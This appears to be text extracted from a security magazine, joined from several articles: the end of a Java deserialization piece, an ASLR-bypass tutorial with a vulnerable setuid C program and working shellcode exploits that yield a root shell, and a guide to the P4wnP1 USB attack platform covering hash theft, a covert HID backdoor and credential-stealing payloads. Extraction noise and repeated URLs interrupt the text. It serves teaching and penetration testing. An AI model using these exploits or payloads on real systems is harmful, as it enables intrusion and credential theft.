document, there is an example of a payload converted to this format and a demonstrative video.

There are also cases where it is necessary to combine deserialization with different techniques (e.g., compression, en-

cryption and payload coding) and other vulnerabilities (e.g., SSRF, XXE, JNDI Injection, EL Injection) in order to suc-

ceed in the exploitation of certain environments / vectors. Often, the arrangement of different CVEs (new and old) 

makes it possible to elevate to critical (e.g., RCE) the impact of vulnerabilities that, at first, were considered low or im-

portant gravity.

In addition to the context of the JVM, the same problem affects other popular technologies, such as PHP [9] [54] [55], 

ASP [56] [57], Node.js [58], Python [59] and Rails [60]. These other cases are equally critical and often lead to remote 

code execution. 

This class of vulnerabilities is not new and, potentially, should not disappear any time soon. New techniques and at-

tack vectors have been published more frequently than equivalent protection mechanisms. In addition, the adoption of 

technologies, frameworks and platforms that do not always value security, with a high level of abstraction and flexibil-

ity - and consequently complexity - contribute to the persistence of such vulnerabilities.

An effective way to control risk in relation to these problems is to understand in essence the mechanisms that lead to 

failures (not just how they can be exploited and/or mitigated). In other words, truly knowing your weaknesses is a 

good starting point for the best adoption of appropriate defense mechanisms. To do this, keep a qualified team nearby.

Finally, a quote from Google's director of information security and privacy:

“Rather than spending tons and tons of money on technology, put a little bit of money on talent and have them do 

nothing but patching.” (Heather Adkins)

Source: TechCrunch Disrupt SF 2017 
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Not so long ago, I published research and an exploit to bypass ASLR, unfortunately (like it happens sometimes), the 

discovery and the project were misunderstood, so I will try to clarify it and I hope that you will learn something from 

it.

Probably most of you are at least familiar with overflow exploitation, but let’s warm-up just in case.

Please note that I’ll omit some technical details and explanations since my article isn’t about system exploitation basics 

that can be found easily elsewhere.

So, here is some C code:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void showInput(char *arg){

  char buffer[1024];

  strcpy(buffer,arg);
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puts("IN ASLR WE TRUST!");}

int main(int argc, char *argv[]){

 if (argc != 2)

  printf("PUT SHELLCODE INTO ENVIRONMENT!\n");

 else

  showInput(argv[1]);

 return 1;}

Basically, the program waits for an argument and copies it into a fixed-size buffer, regardless of the argument’s length, 

which opens-up a possibility of exploitation through the stack.

In order to understand the research, I’ll ask you to perform the following on a Linux Debian 8 (Jessie). You will also 

have to install some packages:

$ sudo apt install gcc libc6-dev-i386

Before I go further for explanations, let’s compile the code as root (super user):

Making stack executable:

$ sudo gcc test.c -o test -z execstack

And disabling ASLR:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Finally, make it executable as root:

$ sudo chmod +s test

Let’s test:

$ ./test

PUT SHELLCODE INTO ENVIRONMENT!

$ ./test shellcode
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IN ASLR WE TRUST!

$ ./test $(for i in {1..2000};do echo -n 'x';done)

Segmentation fault

Finally, the SIGSEGV error, that would mean that the IP register (Instruction Pointer, which contains the instruction 

memory address to execute) contains an inaccessible address (which is ‘xxxxxx’ encoded in ASCII):

However, according to the screenshot of my debugger (GDB + PEDA), RIP contains a valid address in show Input func-

tion, this is because in x64 bits OSes, the kernel won’t allow you to access more than 48 bits (6 bytes) memory space, 

so it will ignore the input that is larger (2000 bytes in our case). Nevertheless, at the end of a function (showInput) 

there is a return (“ret”, in order to continue the execution where it was before the function call), which leads to “pop 

EIP ; jmp EIP”, meaning to execute what is contained at the top of Stack Pointer RSP, which is ‘xxxxxx’, so not an ac-

cessible address, thus not allowed to be in IP - memory management error (segmentation fault).

So, in order to exploit, we will put a small NOP sled (series of instructions that do nothing, so it can “slide” to our shell-

code having an approximate address of it) in the beginning, then our shellcode (assembly instructions that would give 

us a shell), following by a junk of ‘X’ to complete the rest of the buffer plus BP and lastly, the address of our input 

(buffer starting with NOP) inserted into IP.

In order to find that address (which may be different in your case), just look at the RSP address in the previous screen-

shot (there are more ways to find it) adding some bytes to it (because debugger will slightly modify the memory space), 
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converting it to little endian (I assume you’re running an Intel processor). You might also note that the NOP sled isn’t 

necessary in this case, since we can know the exact address to point to, but it’s still a good practice.

Now, let’s exploit:

$ ./test $(for i in {1..100};do echo -ne '\x90';done)\

$ ( e c h o - n e 

'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x

54\x5e\xb0\x3b\x0f\x05')\

$(for i in {1..897};do echo -n X;done)\

$(echo -n 'YYYYYYYY')\

$(echo -ne '\x98\xd8\xff\xff\xff\x7f')

That will give us a shell as root:

Now, let’s try to do the same by compiling it as x32 binary:

$ sudo gcc -m32 test.c -o test32 -z execstack

$ sudo chmod +s test32

Let’s test:

$ ./test32

PUT SHELLCODE INTO ENVIRONMENT!

$ ./test32 shellcode

IN ASLR WE TRUST!

$ ./test32 $(for i in `seq 1 2000`;do echo -n 'x';done)

Segmentation fault
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Almost the same thing so far:

The exploit will be a little bit different:

$ ./test32 $(for i in `seq 1 100`;do echo -ne '\x90';done)\

$ ( e c h o - n e 

'\x31\xdb\x8d\x43\x17\x99\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x

89\xe3\x89\xd1\xcd\x80')\

$(for i in `seq 1 897`;do echo -n X;done)\

$(echo -n 'YYYYYYYY')\

$(echo -n 'ZZZZ')\

$(echo -ne '\x01\xca\xff\xff')

As you might notice, when dealing with x32 bits, the allocated buffer will be 8 bytes bigger (4 if you’re running x32 sys-

tem, storing the allocated size), thus the reason of adding an offset with Ys. 

You also may note that I changed the “\x00\xca\xff\xff” address to “\x01\xca\xff\xff” because, the ‘\x00’ 

character means end of string, which will cut off the shellcode (called “bad character”) and here is where an NOP sled 

comes in handy. The shellcode is different for x32, of course.

Once again it works:
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Now let’s turn back ASLR:

$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

ASLR will randomize addresses every time the program executes. So, the stack address will change and we don’t know 

it, but instead of trying to construct ROP chains, let’s just retry to exploit it the same way without specifying the ESP 

address to EIP, so the kernel itself will make the redirection to the right address:

And ... it worked again, surprisingly, but it worked.

Note that it will work for any other input for the length of 12 (8 additional malloc bytes + 4 bytes of EBP). So, you can 

try it with “@redirection” or even “in_sha_Allah” :)

NOP sled is preferable, but actually not necessary in this case, or can be really small.

You might think that it is because of the huge 1024 bytes buffer, but it also can be done with a much smaller size, like 

32 (or even smaller, but that would require a different approach of exploitation, which isn’t suitable for our phenome-

non):

Seems unbelievable right? But what if you want to use some bad characters in your shellcode (like end-line, tabulation, 

etc.)? Well, you can put it into the environmental variable and once again (with a NOP sled this time or a pretty big 

shellcode), the kernel redirection will do everything for you:
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Definitely you’re wondering, why is that happening? Well, according to my tests, it’s much easier to do on Debian ver-

sions prior to 9 (8.9 and earlier, thus almost all Debian-based, like Kali, ParrotSecOS, Devuan, etc.) and I can see few 

reasons for that.

The first one is that the virtual memory redirections aren’t the same, EIP address at \xff\x?? is redirected directly to 

stack and not to \x08\x04 space like in Ubuntu/Arch.

The second one is that ESP is actually shifted to argv[0] and not to argv[1] like in Ubuntu/Arch. It also might be the 

libc or the ASLR implementation.

The exact reason seems to be that in my code, only one variable was created in the called function, thus when the stack 

is popped to EIP, the shellcode is directly executed, similarly to ROP attack. However, I won’t consider such behaviour 

a 0-day, but at the same time it makes the system vulnerable to attacks within a specific, but realistic context. I also no-

ticed that such technique is similar to Heap-Spraying and especially to Stack-Spraying exploitation. If such vulnerabil-

ity is coupled with Stack Execution Prevention bypass, it can be devastating and I’ll show an example later.

Note that Ubuntu/Arch are also susceptible to such an issue, but only if using environmental variables with a big NOP 

sled (at least a thousand to be pretty quick), specifying about the middle of the stack address (\x80\x80\xff\xff), 

your shellcode has to contain setuid(0) syscall to force shell as root and some retries:

After few dozens attempts:
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Plus, the Stack Smashing Protection has to be disabled:

$ sudo gcc -z execstack -fno-stack-protector test.c -o test

Now the question is - can we apply such a technique for x64 exploits? The answer is YES, but we will need to make 

some kind of brute-force because, you see, x64 memory addressing, although limited to x48 bits, is still much bigger 

than x32, so we still need to aim about the middle of the addressing (\x80\x80\x80\x80\xfc\x7f), do a lot of re-

tries and make a really huge NOP sled. In practice, the shell environment won’t allow a variable length more than a 

hundred thousand characters, plus you won’t be able to clone such a variable more than ten times, but that would be 

enough:

After a while ...

For x64 on Ubuntu/Arch brute-force will take longer because, there is an execution delay, which may be due to the 

ASLR implementation difference (syscall brk() with NULL argument and not 0).

Finally, I decided to automate and universalize the process and give a possibility to customize the shellcode, so I wrote 

a tool that I called ASLRay, just like all my tools, it’s open-source, commented and documented (containing more deep 

technical details and calculations).

To conclude, in order to exploit a x32 binary on Debian 8 you need only to bypass stack execution protection because 

its ASLR is weak.

P.S. I have already contacted Debian security team for that issue - no answer ...
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*** BONUS ***

Using such technique and coupling it with return-to-libC, you can also easily bypass DEP/NX on x32 if compiled with-

out executable stack (default):

$ sudo gcc -m32 test.c -o test32x

You just need to spray the “/bin/sh” argument for libC into the environment like we already did and then perform 

multiple attempts for the libC address itself.

You see, the problem is that ASLR doesn’t really randomize that addresses, we already saw that it isn’t the case for 

stack and we can just specify a middle address (\x80\x80\x80\xff). For libC, this is the case as well, but this time, 

the address is OS-specific and every system has its own constants (most probable is \xe0\x83\x58\xf7 for Debian 

Jessie 8):

After some attempts...

Thus, DEP/NX protection becomes weaker if ASLR is.

Remember, the state of your total security is always equals to your weakest link.
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Introduction

The world of computers is a world of implicit trust. What does this mean? From an attacker’s perspective this means: 

If you’re a trusted entity, there’s no need to bypass security restrictions, you already got behind them. This is well un-

derstood in the world of “social engineering”, where people hand out confidential information to foreigners via phone, 

because they believe they are talking to a superior. This is also true when it comes to software and network communica-

tions, when an attacker gets his hands on security certificates and is able to impersonate a trusted entity. And this be-

comes true in the hardware world, where physical access alone often means trust.

One could say, that isn’t true: “If I use a Windows computer, I could bring up password protection, to keep unauthor-

ized persons out.” Partially true! This isn’t an article about “Gaining access to a Windows machine with SYSTEM level 

privileges in 5 minutes”, although it’s perfectly possible. In fact, Microsoft emphasizes the facts with its Ten Immuta-

ble Laws Of Security. To quote law #3: “If a bad guy has unrestricted physical access to your computer, it's 
not your computer anymore”.

An infamous example of “implicit trust” in the hardware world is the Universal Serial Bus (USB) with its Plug and Play 

capabilities. No doubt, there are people out there remembering how to install a hard disc drive, altering the BIOS to 

setup the correct number of sectors and cylinders after manually configuring it to be master or slave with a jumper. No 

doubt, there are people out there remembering how to manually install a DOS driver for a serial mouse and enable PS2 

emulation to make it work with a broader range of software. But I doubt there are many of these people today. 

Today we are used to USB: We plug in a USB mouse, it works immediately. We plug in an USB mass storage device, no 

matter if it is a 1GB pen drive or a 10 TB hard drive, it works immediately. We plug in a USB WiFi adapter, it works im-

mediately. We plug in an USB webcam, it works immediately. An attacker plugs in a malicious USB device, it 
works immediately!

So why isn’t there a mechanism to prevent an attacker from doing this? Because USB was designed with usability in 

mind. Most of the devices mentioned above don’t even need custom drivers, because the USB standard uses well de-

fined classes and the needed class drivers are delivered built-in with today's operating systems.

So there exists an obvious attack vector and this is what this article is about! It is an article about a framework ena-

bling penetration testers to explore the broad attack surface of USB devices with the low budget Raspberry Pi Zero: 

P4wnP1
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Introduction to P4wnP1 features

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero (about 5 USD) or Rasp-

berry Pi Zero W (about 10 USD). In its current version it is capable of emulating the following USB devices:

• HID keyboards

• USB Mass Storage

• RNDIS network interface (Windows Plug and Play network adapter)

• CDC ECM network interface (MacOS / Linux Plug and Play network adapter)

• Generic HID device (mor on this later)

USB device emulation becomes possible because the default operating system of a Raspberry Pi, Raspbian, comes with 

USB gadget support. An USB gadget essentially emulates an USB peripheral device. Due to the nature of the USB hard-

ware implementation this is only possible on a Raspberry Pi Zero or Raspberry Pi Zero W, as every other Raspberry Pi 

is equipped with an USB Hub, making peripheral emulation impossible. 

P4wnP1 was designed with Plug and Play support in mind. This means the device classes given above could be used in 

all possible combinations, without the need of installing a custom driver. In fact, P4wnP1 works as USB composite de-
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Illustration 1: P4wnP1 emulates multiple USB interfaces bundled into a composite device

P4wnP1  Advanced USB Attacks With A Low Cost Raspberry Pi Zero

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


vice, providing a customizable set of the USB peripherals mentioned above. This means, one could bring up a custom 

device consisting of a keyboard and a network interface, plug it into a Windows computer and it will work immedi-

ately.

This alone would be worth nothing, without the ability to carry out attacks. Beside the USB device classes, P4wnP1 al-

lows the setting up of payloads, which carry out custom attacks based on these USB devices. A payload basically con-

sists of a custom bash script. Instead of running the payload script line by line, a callback mechanism has been imple-

mented, allowing one to trigger actions based on events. Depending on P4wnP1’s payload configuration these events 

are:

• onNetworkUp: This event fires when P4wnP1 is configured to emulate a network device (RNDIS, CDC ECM 

or both) and the network link to the target gets active (which means the target deployed the driver for the net-

work device and ISO/OSI Layer 1 link is up). 

• onTargetGotIP: This event fires when P4wnP1 is configured to emulate a network device (RNDIS, CDC ECM 

or both) and the target host received a DHCP lease. The target IP could be accessed from the bash variable 

$target_ip within payload scripts.

• onKeyboardUp: This event fires when P4wnP1 is configured to emulate an HID keyboard, keyboard driver 

installation on target has finished and keyboard is usable.

• OnLogin: This event fires when a user logs in to P4wnP1 via SSH.

Advanced USB keyboard attack features

The HID keyboard support alone wouldn’t allow one to carry out keyboard based attacks. The vast amount of USB key-

board hardware attacks today are based on RubberDucky or similar hardware. The USB RubberDucky is a device built 

by Hak5, which looks like a USB flashdrive, but emulates a keyboard. In order to carry out its attacks, RubberDucky 

utilizes a scripting language called DuckyScript. DuckyScripts have to be compiled with an encoder and stored onto an 

SD card, which has to be plugged into the RubberDucky. This approach is fairly restricted, as only one payload can be 

used at a time. P4wnP1 is able to use DuckyScript payloads, too. A custom encoder with multi keyboard language lay-

out support has been integrated, which eliminates the need to precompile DuckyScripts. But the possibilities of 

P4wnP1’s HID keyboard go beyond the capabilities of a costly RubberDucky. To name a few:

• Most RubberDucky payloads introduce long startup delays, to allow the target to install the needed keyboard 

drivers (race condition). As P4wnP1 payloads receive a callback event, when the target is ready to receive input, 

the initial delays could be omitted.

• P4wnP1 is able to read back the LED status of the target host keyboard and use it as trigger in its payloads. This 

means a payload doesn’t have to trigger as soon as P4wnP1 is attached to a target, P4wnP1 could be sitting and 
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waiting, till NUMLOCK is pressed frequently on the target’s keyboard before it fires the payload. In fact, the 

payload can branch into different sections if CAPSLOCK or SCROLLLOCK are pressed instead of NUMLOCK.

• The duckhid command is available in keyboard based payloads and accepts DuckyScript from STDIN. This 

means one could run a standard DuckyScript with as single line like this cat /path/to/duckyscript | 

duckhid from within a payload. This becomes even more flexible, if the DuckyScript doesn’t reside in a file, 

but is built from a multi-line string within the payload. This again would allow the use of bash variables and 

thus building dynamic scripts (think about using the $target_ip variable in a dynamic DuckyScript, to type 

out a payload referring to P4wnP1’s current IP) 

• Beside the possibility to use DuckyScript, P4wnP1 supports typing out raw ASCII with the outhid command. 

You want to see the last lines of /var/log/syslog typed out to the target? No problem, tail /var/log/

syslog | outhid does the trick. Again, dynamically generated strings could be used, so this could come in 

handy for status output.

An example for the mentioned features is given by the demo payloads hid_keyboard.txt and hid_keyboard2.txt, which 

ship with P4wnP1.

Other features worth mentioning

• The Raspberry Pi LED could be used for status output with the led_blink command.

• Configuration in USB OTG mode. If a USB OTG adapter is attached to P4wnP1, it will boot into a normal login 

session, instead of running the configured payload. This allows easy configuration with a keyboard and an 

HDMI monitor attached.

• P4wnP1’s github repo links to a rate patch, which modifies the kernel module for USB RNDIS network inter-

face, to emulate a 20 Gbit/s network device. This comes in handy for payloads depending on a low interface 

metric. A 20 Gbit interface wins most races for the routing entry with the lowest metric.

Note: This patch doesn’t get installed by default. The real transfer rate stays below 425 Mbit, due to the 

restrictions of USB 2.0 bus speed.

• Most USB parameters, like VendorID, ProductID and serial number are customizable.

• If both network interfaces, RNDIS and CDC ECM, are enabled for a payload, P4wnP1 automatically decides 

which interface is used by the target, finally (based on link state detection). So there’s no need to worry about 

which interface to use in a payload targeting multiple operating systems. The running interface is stored in a 

variable, available inside the payloads.
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• P4wnP1 runs on top of Raspbian. Installing additional software packages from the Raspbian repo with apt is 

possible.

• If P4wnP1 is used on a Raspberry Pi Zero W (WiFi support) it is able to bring up a WiFi access point, which 

could be used to simply access P4wnP1 via SSH over WiFi or to relay network based attacks through the 
spawned WiFi network.

Demoing P4wnP1’s capabilities – the included payloads

P4wnP1 comes packed with demo payloads, showing its capabilities and how a payload should be built. At the time of 

this writing, the following payloads are included:

Payload: template.txt

This payload does nothing but show the available callback functions, payload options, built-in bash functions and bash 

variables. It is a good starting point for developing a custom payload.

Payload: network_only.txt

This payload enables the RNDIS and CDC ECM network interface. On a Raspberry Pi Zero W (WiFi), additionally a 

WLAN access point gets started. This allows one to connect to P4wnP1 via SSH. With minor modifications this could 

be used to allow P4wnP1 gt Internet access, in order to install additional software.

A small tutorial on how to connect P4wnP1 to the Internet using this payload can be found on YouTube: 

https://www.youtube.com/watch?v=QEWaIoal5qU&t=55s

Payload: hid_keyboard.txt

This payload uses the HID keyboard feature.

This is a simple keyboard payload. It uses an inline DuckyScript to start notepad, utilizing the duckhid command. 

This is followed by printing out the output of echo “Keyboard is running” (raw ASCII, no DuckyScript), utiliz-

ing the outhid command. Attaching P4wnP1 to a Windows target ultimately triggers the payload, as soon as the key-

board driver gets installed.

Payload: hid_keyboard2.txt

This payload uses the HID keyboard feature and status LED control. 

In contrast to the hid_keyboard.txt payload, it doesn’t trigger when P4wnP1 is attached to the target. The payload sits 

and waits for a user interaction from the target host. The command key_trigger is used for this purpose. The 

key_trigger command pauses payload execution, till NUMLOCK, CAPSLOCK or SCROLLLOCK is pressed fre-

229

P4wnP1  Advanced USB Attacks With A Low Cost Raspberry Pi Zero

https://www.youtube.com/watch?v=QEWaIoal5qU&t=55s
https://www.youtube.com/watch?v=QEWaIoal5qU&t=55s
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


quently, multiple times, on the target’s real keyboard. Depending on the key that has been pressed, the command re-

turns a different exit code (1=CAPSLOCK, 2=NUMLOCK, 3=SCROLLLOCK). The result of the trigger function is used 

in a CASE statement, in order to branch into three different payload sections. Thus the follow up output depends on 

the key pressed by the user. Each of the three payload subsections changes the blink count of the status LED, using the 

led_blink command.

The whole payload is wrapped into a loop, which runs the trigger function again and again. This demonstrates the 

power of keyboard LED triggers combined with conditional bash statements, to achieve complex tasks.

Payload: Win10_LockPicker.txt

This payload uses the USB RNDIS network interface and the HID keyboard features.

The keyboard and network interface get combined with additional tools, to build a more complex attack, which steals 

the password hash from a locked Windows machine (user has to be logged in), stores the hash and attempts to crack it 

with John the Ripper (JtR) Jumbo edition. If cracking succeeds, the plain user password gets stored too and is ulti-

mately entered into the lock screen via HID keyboard to unlock the target. 

The advantage of having P4wnP1 backed by a full-fledged ARM based Linux system becomes clear. Although embed-

ded solutions exist capable of carrying out similar attacks, running JtR on them could become a difficult task. The Pi 

Zero manages to calculate about 80,000 to 100,000 hashes per second.

The attack succeeds in less than a minute on a vulnerable target with a weak user password (cracking is based on a ba-

sic dictionary delivered with JtR). Even if hash cracking doesn’t succeed, stolen hashes could be carried away for 

offline cracking.

It is worth mentioning that the payload shows how to use a random USB product ID in order to raise the chances for 

the attack to succeed.

The hash stealing technique deployed, was first published by ROB ‘MUBIX’ FULLER  

(https://room362.com/post/2016/snagging-creds-from-locked-machines/) and is backed by a tool called Responder. 

Responder is able to answer requests to a bunch of protocols with the goal to grab password hashes.

The base idea is slightly improved in this payload, by handing out static route entries for the whole IPv4 range to the 

target via DHCP and changing the USB product ID, to enforce installing a new network adapter to the target.

For further details on the inner workings of the attack, see P4wnP1’s project README.

A demo of the LockPicker payload in action can be found on YouTube:  

https://www.youtube.com/watch?v=7fCPsb6quKc
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Payload: hid_frontdoor.txt

This is a fairly advanced payload, for a very special use case.

It is meant to deal with the following situation:

During engagements, often physical access to unlocked Windows hosts is given. Anyway, this could be very limited. An-

tivirus blocks downloading network based payloads. Endpoint protection denies mounting USB flash drives. Bringing 

up a new network interface triggers multiple alerts. 

The ultimate goal is to bring in and execute arbitrary code, anyway. This is exactly the aim of this payload.

The only thing the “frontdoor” needs is to install on the target, are two HID devices. One of them being a normal key-

board and the other one a generic HID device. In most well protected environments, exactly this is allowed.

Bringing up a keyboard isn’t a problem most of the time. Even if only a small set of USB vendors and product IDs are 

whitelisted, P4wnP1 would be able to incorporate them. This essentially means, executing arbitrary commands isn’t a 

big problem. But this is a road with only one direction: P4wnP1 could communicate to the target, but the target can’t 

communicate to P4wnP1.

This is only half of the truth. Of course a keyboard has a back channel. Otherwise one couldn’t see LEDs light up when 

CAPSLOCK is pressed, for example.

In short words, for a default keyboard most operating systems send back 3 bits, each representing an LED (CAPS, 

NUM, SCROLL) every time the key state changes.

To stay realistic, this backchannel is barely usable. With USB 2.0 speed the LED state is sent up to 1,000 times per sec-

ond (theoretical maximum). This corresponds to a transfer rate of 3,000 bits per second (375 bytes per second), with-

out error correction and other protocol overhead. And, of course, no pentester wants to see blinking LEDs or 

CAPSLOCK turned on and off frequently, while working.

This is where the second HID device comes to help. While still using Windows class drivers (Plug and Play installa-

tion), it is able to communicate with 64,000 bytes per second in both directions.

So a usable communication channel could be deployed, as long as the target knows how to communicate, which Win-

dows, unfortunately does not.

There has to be some kind of driver, to establish a communication protocol.

The “frontdoor” payload was a Proof of Concept demoing this and it has its uses.

If P4wnP1 is attached to the target, with this payload running – nothing happens at all. At least, till the pentester 

presses NUMLOCK on the keyboard of an unlocked Windows target multiple times. This is going to trigger the 
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P4wnP1 keyboard device, which opens a PowerShell session and prints out a “user space driver” to communicate with 

P4wnP1 via the second HID device.

All of these happen very fast, there are no administrative privileges needed, everything runs in-memory, nothing 

touches disc. The forensic footprint is kept as small as possible.

After the initial payload stage has finished, the pentester is presented with a custom shell, which allows to run com-

mands on both:

• a bash on P4wnP1

• in PowerShell on the target itself

The shell allows one to download files from P4wnP1 directly into the memory of the running PowerShell process, again 

without touching disc. These files are stored into a custom PowerShell variable, which has the type byte[]. Converting 

such a variable to a UTF-8 string and invoking it as PowerShell code, could essentially been done in one single line.

So it is, for example, possible to inject arbitrary PowerShell scripts, which are hosted on P4wnP1’s file system, into a 

PowerShell process of the target, unseen by antivirus or firewall or endpoint protection.

As stated, this payload was developed as Proof of Concept, the “hid_backdoor” payload is bringing the base idea to its 

full extent.
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The illustrations roughly show the inner workings of the HID frontdoor. The pentester acts directly on the target ma-

chine.

A video demo of the frontdoor payload can be found on YouTube:

https://www.youtube.com/watch?v=MI8DFlKLHBk

The “flagship” payload: hid_backdoor.txt

The HID backdoor is the “flagship” payload of P4wnP1. It is still under development and features are added regularly.

As stated, the payload brings the base idea of the HID covert channel to its full extent. In fact, it gives full backdoor ac-

cess to a Windows target via WiFi, while the target only sees HID devices. Again, no network connection, no serial con-

nection. Thus the footprint is very low.

The underlying communication protocol has been refined multiple times, to use the maximum transfer rate of 64,000 

bytes per second as effective as possible and to allow multi-channel communication at the same time. Because of this 

fact, it is possible to run multiple remote shells and file transfers concurrently. The client side code has been ported to 

a .NET library and no longer relies on PowerShell itself. Anyway, PowerShell is used to start the payload (hosting proc-

ess). This has several advantages, among others:

• Even lower footprint, as the PowerShell module logging couldn’t fetch executed code (in contrast to the front-

door payload, which is based on pure PowerShell).

• Each remote process is run with dedicated threads – the same goes for the client side payload itself.

• Inter-thread-communication is used to keep the CPU load and memory consumption as low as possible (at 

least as low as managed .NET code allows).

The communication scheme shown in the illustration is much more complex than the one of the “frontdoor” payload. 

From the pentester’s perspective, it could be brought down to:

1. Attach P4wnP1 to the target

2. Wait for the new WiFi network to appear, which gets spawned by P4wnP1

3. Connect to the WiFi network via SSH, to interface with the P4wnP1 shell

4. Run keyboard attacks on demand, triggered via WiFi (fire custom DuckyScripts) …

5. … or fire a stager, in order to bring up a bidirectional communication channel to the target, which uses only 

the generic HID device (covert channel).

6. With the covert channel: Create remote processes, interact with them, pop shells and transfer files.
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In summary:

The payload is basically a keyboard, able to run keyboard attack scripts controlled from a WiFi accessible shell. If the 

command to bring up the covered channel is issued, it gets a full-fledged backdoor, with a very low profile which is 

hard to stop and hard to detect.

The idea behind using SSH, beside many other advantages, is to have a control mechanism which allows tunneling 

TCP connections.

At the time of this writing, the support for file system access (data injection and exfiltration via HID) is nearly finished. 

The next ToDo will be to relay TCP sockets through the covert HID channel. This will allow one to bring up TCP tun-

nels into the target’s network (pivoting).

Seytonic provides a brief introduction to the payload on YouTube:

https://www.youtube.com/watch?v=Pft7voW5ui8

Installing P4wnP1

P4wnP1 is hosted on github.com and can be found here:
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Illustration 3: HID backdoor schematics
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https://github.com/mame82/P4wnP1

Install instructions are written down in INSTALL.md, which can be found here:

https://github.com/mame82/P4wnP1/blob/master/INSTALL.md

Frequently asked questions (FAQ) are answered here:

https://github.com/mame82/P4wnP1/blob/master/FAQ.md

There are several good reasons not to include install instructions in a static article like this:

• P4wnP1 is still under heavy development and extended on a regular basis, which is likely to change the install 

process.

• P4wnP1 is implemented on top of Raspbian. As this distribution is updated regularly, this could change the in-

stall procedure.

• The install process could be handled by beginners, but they often need support. So I recommend reading the 

issues on the github repo (including closed ones), as many problems have been solved already. 

Some important hints should be given anyway:

• Once P4wnP1 is installed successfully, it could be used with a standard micro USB device cable. Most issues re-

ported so far originated from using wrong or defect USB cables.

• Testing the built-in demo payloads, most people forget to change the language layout for keyboard attacks, 

which of course renders these attacks unusable.

• Often the repo isn’t cloned “recursively” as described in the install instructions. This leads to missing compo-

nents and unneeded issues. Supporting them consumes time which could be used for development.

• Some people have problems maintaining Internet access, while the installer is running. If this happens, impor-

tant components fail to install. This includes a kernel patch, which is a must-have in order to make the HID key-

board work.

• Most payloads could be run with a Raspberry Pi Zero (including the one developed in this article). The “flag-

ship” feature is the “hid_backdoor” payload, which needs a Pi Zero W (WiFi) to work. So using a WiFi capable 

Raspberry Pi Zero is recommended.

With this advice kept in mind, installing P4wnP1 shouldn’t be a problem. Succeeding with the installation means one 

could build an advanced pentesting gadget out of a $5 USD device. Comparable devices come at costs of twenty times 

as much. Using a $10 USD Raspberry Pi Zero W instead, it becomes hard to even find devices able to compete with the 

HID backdoor capabilities.
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Developing a custom payload or “Stealing Windows Browser Credentials with 

P4wnP1”

This is the section where the real fun starts. We’re going to develop a real payload. The goal: Using P4wnP1 to steal 

and store browser credentials from a Windows user.

This is a real world attack that I use in engagements after getting an initial foothold to a target (POST exploitation). So 

the underlying attack isn’t rocket science. Anyway, testing the payload, I was a bit surprised about the information 

stored on my own machine. 

To follow the tutorial, a Windows 10 or Windows 7 machine is needed. Additionally, Putty comes in handy, in order to 

access P4wnP1 via SSH. WinSCP could support file transfer, if you don’t want to edit the payload files from the SSH 

session, but use a Windows editor instead.

Bringing up a basic PowerShell script

So before we dive into P4wnP1 payload development, let me show you how to achieve our goal with pure PowerShell:

The short script shown in Listing 1 prints the username and passwords for every Internet resource for which creden-

tials have been saved to Windows Credential Store (and at least the username for logins for which the password hasn’t 

been saved).

Line 1 of the script exposes the needed class “Windows.Security.Credentials.PasswordVault” to the PowerShell 

runspace. The next line calls the RetrieveAll() method of this class, to retrieve a list of stored credential objects. Print-

ing out the list at this point would reveal no single password. Even if a password is stored. It has to be retrieved one by 

one for every single credential object. This is done in line 3. Finally, the properties Resource, UserName and Pass-

word of each object are printed as table in line 4.

Running the script on my testing machine, the following output is generated:
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 Listing 1. Follow up numbering would be messed without
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If you run this on your machine and are able to see all your stored passwords, use Google to get some hints on how to 

delete them (storing passwords on a machine isn’t safe is physical access is given to an attacker – remember the “Ten 

immutable laws of Security” mentioned in the introduction). 

If the list on your test machine is empty, no problem. It could be filled like this:

Open Edge browser (or Internet Explorer) and browse to a page which asks for login credentials. Here’s my example 

for Twitter:

